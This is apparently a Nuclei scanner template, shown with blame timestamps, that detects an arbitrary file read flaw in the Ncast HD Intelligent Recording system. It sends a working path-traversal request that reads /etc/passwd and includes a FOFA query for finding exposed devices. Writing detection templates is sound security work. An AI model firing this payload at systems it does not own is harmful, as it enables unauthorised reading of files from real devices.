2024-07-17 19:04:21 +00:00
|
|
|
id: ncast-lfi
|
|
|
|
|
|
|
|
info:
|
2024-07-21 08:28:28 +00:00
|
|
|
name: Ncast HD Intelligent Recording - Arbitrary File Reading
|
2024-07-17 19:04:21 +00:00
|
|
|
author: pussycat0x
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability.
|
|
|
|
reference:
|
|
|
|
- https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
|
|
|
metadata:
|
|
|
|
fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
|
2024-07-21 08:28:28 +00:00
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
tags: ncast,lfi
|
2024-07-17 19:04:21 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/developLog/downloadLog.php?name=../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
2024-07-21 08:28:28 +00:00
|
|
|
part: body
|
2024-07-17 19:04:21 +00:00
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
2024-07-21 08:28:28 +00:00
|
|
|
- type: word
|
|
|
|
part: content_type
|
|
|
|
words:
|
|
|
|
- "application/force-download"
|
|
|
|
|
2024-07-17 19:04:21 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-07-21 08:49:01 +00:00
|
|
|
# digest: 4a0a00473045022100c3ccb20d4d2894d7ad538e05b308dd310907922254ad4c9bda70fdb35a4209de02202ed3f40e27ef9ae92809083d6a8f7df2d7dc1c0cf4c9c7cb8cde61b8717159ff:922c64590222798bb761d5b6d8e72950
|